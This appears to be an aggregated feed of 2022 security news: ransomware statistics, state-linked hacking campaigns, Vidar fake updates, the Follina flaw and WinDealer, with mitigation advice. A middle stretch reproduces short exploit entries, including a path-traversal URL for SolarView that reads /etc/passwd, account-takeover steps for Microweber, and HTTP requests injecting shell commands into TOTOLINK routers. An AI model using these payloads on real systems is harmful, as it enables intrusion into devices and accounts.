May 2022 saw the continued dominance of LockBit, and a possible disbursement of the Conti gang into other ransomware groups.
The post Ransomware: May 2022 review appeared first on Malwarebytes Labs.

The Malwarebytes Threat Intelligence team monitors the threat landscape continuously and produces monthly ransomware reports based on a mixture of proprietary and open-source intelligence.

**Conti sleight of hand?**

Although LockBit remained the most widely-deployed ransomware in May 2022, it was, typically, Conti that sucked all of the air out of the room.

Conti ransomware and the group that distributes it has been a dangerous, noisy presence in the ransomware ecosystem since 2020. It has been involved in hundreds of attacks, including the horrific disabling of Ireland’s Health Service Executive, and according to the FBI, it is “the costliest strain of ransomware ever documented”, having raked in over $150 million in ransom payments.

Recently, the group has had its troubles. On February 27, an individual with access to the group’s inner-workings started leaking a treasure trove of data that included source code, files, and tens of thousands of internal chat messages. Not long after, a hacking group began using the leaked source code to attack targets inside Russia, violating one of ransomware’s unspoken rules. And at the start of this month, the FBI put a $10 million bounty on the group’s head.

On May 8 the newly-inaugurated president of Costa Rica declared a national emergency across the country’s public sector, in response to the continuing effects of a devastating Conti ransomware attack carried out in April. On the same day, an inflammatory message appeared on the group’s leak site, alongside a leak of 672 GB of stolen data.

The message itself is the usual grandiose puffery: It took a swing at US President Joe Biden—”this old fool will soon die”, claimed the attack had been carried out by just two people, and threatened that Costa Rica was just a “Demo version” of what was to come.

You would be forgiven for thinking that despite recent travails, Conti is going strong.

But according to an in-depth analysis by Advintel though, that’s what it wants you to think. It says that far from being in rude health, the Conti brand is in the process of disbanding and that the attacks on Costa Rica were a deliberately showy act from an operation being run by a skeleton crew.

It seems that the decision to offer its “full support of Russian government” in February, following the invasion of Ukraine, may have been a fatal error. By aligning itself to the Russian state it had made ransom payments a potential sanctions violation, killing the group’s income.

Advintel asserts that as a result the Conti group has been “silently creating subdivisions that began operations before the start of the shutdown process.” These subdivisions—said to include KaraKurt, BlackByte, BlackBasta—are supposed to establish themselves before Conti disappears to avoid the kind of shallow and transparent rebrand some other groups have pursued.

Malwarebytes Threat Intel has been able to confirm that there was an internal announcement about the shutdown for affiliates, and that the group’s internal chat servers are down, although the leak site is still operational, and updated almost daily with additional data.

**Ransomware attacks in May 2022**

Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom.

In May, LockBit remained by far the most widely-used ransomware. Conti remained active, but its activity was significantly reduced compared to recent months. Notably, three of the four groups that have overtaken it—Black Basta, Hive, and ALPHV—are linked to the alleged Conti disbandment. Intriguingly, Hive was named as the ransomware used in an attack on Costa Rica’s national health service on May 31.

The USA remained far and away the country most badly affected by ransomware attacks in May, and services the industry sector more likely to be attacked.

Known ransomware attacks by group, May 2022

Known ransomware attacks by country, May 2022

Known ransomware attacks by industry, May 2022

****Ransomware mitigations****

Source: IC3.gov

*   Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Ensure these copies are not accessible for modification or deletion from any system where the original data resides.
*   Implement network segmentation, such that all machines on your network are not accessible from every other machine.
*   Install and regularly update antivirus software on all hosts, and enable real-time detection.
*   Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
*   Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
*   Audit user accounts with administrative privileges and configures access controls with the least privilege in mind. Do not give all users administrative privileges.
*   Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.
*   Consider adding an email banner to emails received from outside your organization.
*   Disable hyperlinks in received emails.
*   Use double authentication when logging into accounts or services.
*   Ensure routine auditing is conducted for all accounts.
*   Ensure all the identified IOCs are input into the network SIEM for continuous monitoring and alerts.

****How Malwarebytes protects against ransomware****

Malwarebytes can protect systems against all ransomware variants in several ways.

The Malwarebytes Anti-Malware technology detects malicious files, browser modifications, and system modifications on Windows PCs using a combination of signature-based and signatureless technologies. This layer of protection detects the Ransomware binary itself. Detections can happen in real-time as the binary is run or the infection can be rooted out from an already-compromised machine by conducting a full system scan.

Anti-Ransomware is a signatureless technology in charge of monitoring system activity of processes against a certain subset of data in specific locations on the endpoint. Using patented technology, Anti-Ransomware assesses changes in those data files. If an internal scoring threshold is crossed by a monitored process, it triggers a detection from the Anti-Ransomware component.

For those already infected, Ransomware Rollback can help recover encrypted files within 72 hours of the attack. Rollback creates a local cache on the endpoint to store changes to files on the system. It can use this cache to help revert changes caused by a threat. The rollback feature is dependent on activity monitoring available in Malwarebytes Endpoint Detection and Response.

Ransomware: May 2022 review

The attack on Israeli organizations is the latest in a long line of attempts to compromise supply chains, as the APT looks to leverage that access to target a multitude of potential victims.

After detecting a Lebanese hacking group it calls Polonium abusing its OneDrive personal storage service, Microsoft says it was able to disable the group, which could have links to the Iranian government.

In its latest effort, the advanced persistent threat (APT) targeted more than 20 Israeli organizations and one intergovernmental organization. The Microsoft Threat Intelligence Center (MSTIC) says it suspended more than 20 malicious OneDrive applications created by Polonium actors in the campaign.

Among the targeted organizations were those involved in critical manufacturing, transportation systems, financial services, IT, and Israel’s defense industry, the software giant says – all of which offer an avenue to carry out downstream supply chain attacks.

"In at least one case, Polonium’s compromise of an IT company was used to target a downstream aviation company and law firm in a supply-chain attack that relied on service provider credentials to gain access to the targeted networks," according to MSTIC. "Multiple manufacturing companies they targeted also serve Israel’s defense industry, indicating a Polonium tactic that follows an increasing trend by many actors, including among several Iranian groups, of targeting service provider access to gain downstream access."

**Polonium's Infection Routine**

In 80% of the observed cases, the group exploited a flaw in Fortinet VPN appliances (likely via CVE-2018-13379 vulnerability) to gain initial access. Then they installed a custom PowerShell implant called CreepySnail on the target networks, according to Microsoft. From there, the actors deployed a set of tools named CreepyDrive and CreepyBox to abuse legitimate cloud services for command-and-control (C2) across most of their victims. 

MSTIC says with “moderate confidence” that the attacks were likely carried out with help from Iran’s Ministry of Intelligence and Security (MOIS).

"The observed activity was coordinated with other actors affiliated with Iran's \[MOIS\], based primarily on victim overlap and commonality of tools and techniques," the MSTIC assessment states. “The tactic of leveraging IT products and service providers to gain access to downstream customers remains a favorite of Iranian actors and their proxies.”

**Cyber Operations in Support of State Objectives**

Sherrod DeGrippo, Proofpoint’s vice president of threat research and detection, explains that Iran, specifically MOIS, uses a variety of organizations and affiliates to conduct cyber operations in support of Iranian government interests.

“This activity, which spans the spectrum of state responsibility, mirrors Iran’s material support to various organizations,” she says.

From DeGrippo’s perspective, this report demonstrates another example of how Iran and Israel are engaged in cyber conflict and comes amid rising gray zone tensions between Iran and its adversaries.

In March 2021, for example, Proofpoint reported on how the Iran-aligned threat actor TA453 had targeted Israeli and American medical researchers in late 2020. TA453 has historically aligned with Islamic Revolutionary Guard Corps (IRGC) priorities, targeting dissidents, academics, diplomats, and journalists.

“While this campaign may have been a one-off requirement, TA453 targeting Israeli organizations and individuals is consistent with these ever-increasing geopolitical tensions between the two countries,” she noted.

**Defense Should Focus on Authentication Activity**

Mike Parkin, senior technical engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber-risk remediation, says that while knowing Polonium’s exact motivation is impossible, given the known animosity between the states involved, it’s a “reasonably safe bet” they are trying to do as much damage to their targets as possible as part of a larger agenda.

“State and state-sponsored threat actors compound the problems presented by common cybercriminal groups,” he explains to Dark Reading. “Where criminals are typically after information for sale, data to hold for ransom, or resources to use for further attacks, state-level actors often have additional, much deeper motivations,” such as cyber-espionage or destructive attacks.

Because of the overlap in techniques and tools, it can be difficult to tell the two apart, which can complicate the matter for targeted organizations, he adds.

**Fending Off State-Sponsored Cyberattacks**

To thwart attacks like these, Microsoft advises that organizations should review all authentication activity throughout their remote access infrastructure and VPNs. A particular focus should be fixed on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.

Parkin points out that access and authentication logs can easily reveal suspicious activity and keep an attempted breach from turning into a newsworthy incident.

“There is an old saying from system administration about the uselessness of keeping logs that are never reviewed,” he says. “With access logs, regular reviews for suspicious activity should be happening regularly. If not, why keep them?”

In addition to patching known vulnerabilities, Proofpoint’s DeGrippo also notes that a basic best practice for defense is ensuring that all remote-access accounts are required to enable multifactor authentication (MFA).

“Those accounts that require only single-factor authentication do not have the protection MFA provides, allowing an attacker to successfully phish or social engineer a user’s password without encountering a secondary authentication,” she adds.

**VPNs: Taking a Page From Fancy Bear**

Phil Neray, vice president of cyber-defense strategy at CardinalOps, a threat coverage optimization company, tells Dark Reading that Russian threat actor Fancy Bear (aka APT28 and Strontium) also targeted VPNs on a large scale in 2018 with the VPNFilter campaign, which similarly targeted critical infrastructure.

MITRE ATT&CK categorizes this approach as T1133 External Remote Services, with recommended mitigations including creating security information and event management (SIEM) detection queries that examine authentication logs for unusual access patterns, windows of activity, and access outside of normal business hours.

“Exploiting vulnerable VPNs as the initial access point, as in this campaign, is also attractive since VPNs are Internet-exposed on one side and provide direct access to the victim network on the other,” Neray says. “We recommend ensuring your SIEM has specific detections for it, such as monitoring for suspicious logins.”

Microsoft Disables Iran-Linked Lebanese Hacking Group Polonium

By Owais Sultan
In this digital era, online threats are booming as much as the internet user base. Sometimes, malware infects…
This is a post from HackRead.com Read the original post: Fake Updates Continue To Be A Digital Risk: What To Do?

In this digital era, online threats are booming as much as the internet user base. Sometimes, malware infects devices due to vulnerabilities unknown to people. However, it frequently comes as a direct consequence of users’ actions. For instance, entering that suspicious website promising exclusive content or software for free. Speaking of human error, one of the most popular techniques used by hackers is fake updates.

But what are fake updates? These are malicious software downloads masquerading as legitimate updates. This type of malware is often used to infect devices with ransomware. The recent development in this is Vidar Malware. What are its risks, and how to contain them?

**What is Vidar malware? **

The recent fake update was discovered impersonating a Windows 11 download portal. These portals ultimately caused a Vidar malware infection. The same malware was found to be spreading through the fake InterVPN website.

Vidar is a kind of info-stealing malware that may be utilized to monitor users. This malicious software can steal login credentials, take screenshots, bank details, etc. Besides general info stealing, Vidar was also discovered downloading and executing additional malware payloads. Moreover, the malware deletes itself from the system after completing its work.

Fake Windows 11 download website delivering Vidar malware

**How does Vidar work? **

It is being spread across the internet using phishing, fallout exploit kit, and pay-per-install PrivateLoader dropper. The email contains an attachment as a .iso disk image, which is misleadingly called “request.doc.” This ISO is mainly composed of two files:  an executable (app.exe) and a Microsoft Compiled HTML Help (CHM) file (pss10r.chm).

Here’s how it enters the systems: When a notorious CHM file is loaded, a JavaScript snippet executes the app.exe. The second stage downloads and decodes the Vidar malware, which is then performed on the system.

Then, the Vidar samples communicate with their C2 server via Mastodon and Telegram. After successful communication, user profile bio sections are examined, and C2 addresses are extracted from the profiles. The malware is then copied to the target system, where it sets up its configuration and begins collecting user data.

So, this is how it hides its presence in your system. But how to save our devices from such attacks?

**How to protect yourself?**

Now that you know how to identify fake updates, it’s time to take measures to protect yourself. Here are some tips:

**Use a firewall**

This security system helps screen out incoming and outgoing network traffic. Good firewalls can often prevent malware from contacting the Command & Control server. It is how ransomware works – it needs to contact the C&C server to get a key that can encrypt your files. If it can’t reach the C&C server, it can’t get the key and thus can’t do any harm.

**Protect internet connection**

Your computer is only a part of the defense strategy you must employ. Malware can exploit many vulnerabilities, including unsecured networks. Luckily, you can guarantee that each network you connect to is safe. 

All it takes is setting up a VPN for Windows on your laptop and enabling it whenever you use it outside the home. Public Wi-Fi can be extremely dangerous: outsiders can snoop on your activities or use security loopholes to infect your device. Therefore, remember never to connect your devices, be it a Windows laptop or an Android smartphone, to free Wi-Fi without a VPN. 

**Change your update settings**

We often have our update settings on auto-update. It will install itself as soon as an update is available. This option should be preferred as it ensures you can have a PC running the latest operating system. If you do not schedule automatic updates, you may delay updates indefinitely. 

**Say no to piracy**

Free software and games can be tempting but can be a source of cyberattacks. Therefore, use only licensed software. This way, you will be sure that your updates are from a trusted source. Additionally, stay away from alleged exclusive offers for programs on random websites. 

**Install an antivirus**

An antivirus program will scan all incoming and outgoing files for a malicious activity like ransomware or adware. If it detects anything suspicious, it will alert users and recommend removal. Of course, it is essential to get a trusted antivirus program. Many fake antivirus programs could warn you about fake threats because they wish you to buy premium versions. 

So, even if you accidentally click on a fake update, the antivirus will take care of it. Install updates only from official websites. It is the safest way to ensure that the update is legitimate. If you ever come across any pop-ups that look legitimate, don’t click on them. It is best to counter-check the update on the official website and then download it from there.

**Always keep your system updated**

The best way to know whether any update is fake is to keep your system up to date. Any unexpected update now will be quite suspicious. Moreover, updates often contain security patches that fix vulnerabilities in your system. So, it’s always a good idea to keep your system updated.

**Backup your data**

This is more of a precautionary measure than anything else. By backing up your data, you ensure that you won’t lose any important files even if your device gets infected with ransomware. Many cloud storage options are available these days that offer good security and are affordable.

**Conclusion**

Apart from these precautions, it is essential to practice safe surfing to avoid these threats from detecting your device.

Fake Updates Continue To Be A Digital Risk: What To Do?

SolarView Compact version 6.00 suffers from a directory traversal vulnerability.

Change Mirror Download

    # Exploit Title: SolarView Compact 6.00 - Directory Traversal# Date: 2022-05-15# Exploit Author: Ahmed Alroky# Author Company : Aiactive# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/# Version: ver.6.00# Vendor home page : https://www.contec.com/# Authentication Required: No# CVE : CVE-2022-29298# Tested on: Windows# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg

SolarView Compact 6.00 Directory Traversal

Microweber CMS versions 1.2.15 and below suffer from an account takeover vulnerability.

    # Exploit Title: Microweber CMS 1.2.15 - Account Takeover# Date: 2022-05-09# Exploit Author: Manojkumar J# Vendor Homepage: https://github.com/microweber/microweber# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15# Version: <=1.2.15# Tested on: Windows10# CVE : CVE-2022-1631# Description:Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 OauthMisconfiguration Leads To Account Takeover.# Steps to exploit:1. Create an account with the victim's email address.Register endpoint: https://target-website.com/register#2. When the victim tries to login with default Oauth providers like Google,Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login)with that same e-mail id that we created account before, via this way wecan take over the victim's account with the recently created logincredentials.

Microweber CMS 1.2.15 Account Takeover

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function NTPSyncWithHost of the file system.so which can control hostTime to attack.

There is a remote command injection in the function NTPSyncWithHost of the file system.so , we can control thehostTime to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"NTPSyncWithHost",
    "hostTime":"\"\nps>/web_cste/test1\n\""}

CVE-2021-42890: vuln/totolink_ex1200t_hosttime_rce.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function setLanguageCfg of the file global.so which can control langType to attack.

There is a remote command injection in the function setLanguageCfg of the file global.so , we can control thelangType to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setting/setLanguageCfg",
    "langFlag":"1",
    "langType":"\nps>/web_cste/test1\necho"}

CVE-2021-42888: vuln/totolink_ex1200t_langtype_rce.md at main · p1Kk/vuln

The company continues to downplay the severity of the Follina vulnerability, which remains present in all supported versions of Windows.

Researchers warned last weekend that a flaw in Microsoft's Support Diagnostic Tool could be exploited using malicious Word documents to remotely take control of target devices. Microsoft released guidance on Monday, including temporary defense measures. By Tuesday, the United States Cybersecurity and Infrastructure Security Agency had warned that “a remote, unauthenticated attacker could exploit this vulnerability,” known as Follina, “to take control of an affected system.” But Microsoft would not say when or whether a patch is coming for the vulnerability, even though the company acknowledged that the flaw was being actively exploited by attackers in the wild. And the company still had no comment about the possibility of a patch when asked by WIRED yesterday.

The Follina vulnerability in a Windows support tool can be easily exploited by a specially crafted Word document. The lure is outfitted with a remote template that can retrieve a malicious HTML file and ultimately allow an attacker to execute Powershell commands within Windows. Researchers note that they would describe the bug as a “zero-day,” or previously unknown vulnerability, but Microsoft has not classified it as such.

“After public knowledge of the exploit grew, we began seeing an immediate response from a variety of attackers beginning to use it,” says Tom Hegel, senior threat researcher at security firm SentinelOne. He adds that while attackers have primarily been observed exploiting the flaw through malicious documents thus far, researchers have discovered other methods as well, including the manipulation of HTML content in network traffic.

 “While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” Hegel says. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.” 

The vulnerability is present in all supported versions of Windows and can be exploited through Microsoft Office 365, Office 2013 through 2019, Office 2021, and Office ProPlus. Microsoft's main proposed mitigation involves disabling a specific protocol within Support Diagnostic Tool and using Microsoft Defender Antivirus to monitor for and block exploitation. 

But incident responders say that more action is needed, given how easy it is to exploit the vulnerability and how much malicious activity is being detected. 

“We are seeing a variety of APT actors incorporate this technique into longer infection chains that utilize the Follina vulnerability," says Michael Raggi, a staff threat researcher at the security firm Proofpoint who focuses on Chinese government-backed hackers. "For instance, on May 30, 2022, we observed Chinese APT actor TA413 send a malicious URL in an email which impersonated the Central Tibetan Administration. Different actors are slotting in the Follina-related files at different stages of their infection chain, depending on their preexisting toolkit and deployed tactics.”

Researchers have also seen malicious documents exploiting Follina with targets in Russia, India, the Philippines, Belarus, and Nepal. An undergraduate researcher first noticed the flaw in August 2020, but it was first reported to Microsoft on April 21. Researchers also noted that Follina hacks are particularly useful to attackers because they can stem from malicious documents without relying on Macros, the much-abused Office document feature that Microsoft has worked to rein in.

“Proofpoint has identified a variety of actors incorporating the Follina vulnerability within phishing campaigns," says Sherrod DeGrippo, Proofpoint's vice president of threat research.

With all this real-world exploitation, the question is whether the guidance Microsoft has published so far is adequate and proportionate to the risk. 

“Security teams could view Microsoft’s nonchalant approach as a sign that this is ‘just another vulnerability,’ which it most certainly is not,” says Jake Williams, director of cyber threat intelligence at the security firm Scythe. “It’s not clear why Microsoft continues to downplay this vulnerability, especially while it’s being actively exploited in the wild.”

An Actively Exploited Microsoft Zero-Day Flaw Still Has No Patch

An "extremely sophisticated" Chinese-speaking advanced persistent threat (APT) actor dubbed LuoYu has been observed using a malicious Windows tool called WinDealer that's delivered by means of man-on-the-side attacks.
"This groundbreaking development allows the actor to modify network traffic in-transit to insert malicious payloads," Russian cybersecurity company Kaspersky said in a new report.

An "extremely sophisticated" Chinese-speaking advanced persistent threat (APT) actor dubbed **LuoYu** has been observed using a malicious Windows tool called WinDealer that's delivered by means of man-on-the-side attacks.

"This groundbreaking development allows the actor to modify network traffic in-transit to insert malicious payloads," Russian cybersecurity company Kaspersky said in a new report. "Such attacks are especially dangerous and devastating because they do not require any interaction with the target to lead to a successful infection."

Known to be active since 2008, organizations targeted by LuoYu are predominantly foreign diplomatic organizations established in China and members of the academic community as well as financial, defense, logistics, and telecommunications companies.

LuoYu's use of WinDealer was first documented by Taiwanese cybersecurity firm TeamT5 at the Japan Security Analyst Conference (JSAC) in January 2021. Subsequent attack campaigns have used the malware to target Japanese entities, with isolated infections reported in Austria, Germany, India, Russia, and the U.S.

Other tools that are part of the adversary's malware arsenal include PlugX and its successor ShadowPad, both of which have been used by a variety of Chinese threat actors to enable their strategic objectives. Additionally, the actor is known to target Linux, macOS, and Android devices.

WinDealer, for its part, has been delivered in the past via websites that act as watering holes and in the form of trojanized applications masquerading as instant messaging and video hosting services like Tencent QQ and Youku.

But the infection vector has since been traded for another distribution method that makes use of the automatic update mechanism of select legitimate applications to serve a compromised version of the executable on "rare occasions."

WinDealer, a modular malware platform at its core, comes with all the usual bells and whistles associated with a backdoor, allowing it to hoover sensitive information, capture screenshots, and execute arbitrary commands.

But where it also stands apart is its use of an IP-generation algorithm to select a command-and-control (C2) server to connect to at random from a pool of 48,000 IP addresses.

"The only way to explain these seemingly impossible network behaviors is by assuming the existence of a man-on-the-side attacker who is able to intercept all network traffic and even modify it if needed," the company said.

A man-on-the-side attack, similar to a man-in-the-middle attack, enables a rogue interloper to read and inject arbitrary messages into a communications channel, but not modify or delete messages sent by other parties.

Such intrusions typically bank on strategically timing their messages such that the malicious reply containing the attacker-supplied data is sent in response to a victim's request for a web resource before the actual response from the server.

The fact that the threat actor is able to control such a massive range of IP addresses could also explain the hijacking of the update mechanism associated with genuine apps to deliver the WinDealer payload, Kaspersky pointed out.

"Man-on-the-side-attacks are extremely destructive as the only condition needed to attack a device is for it to be connected to the internet," security researcher Suguru Ishimaru said.

"No matter how the attack has been carried out, the only way for potential victims to defend themselves is to remain extremely vigilant and have robust security procedures, such as regular antivirus scans, analysis of outbound network traffic, and extensive logging to detect anomalies."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows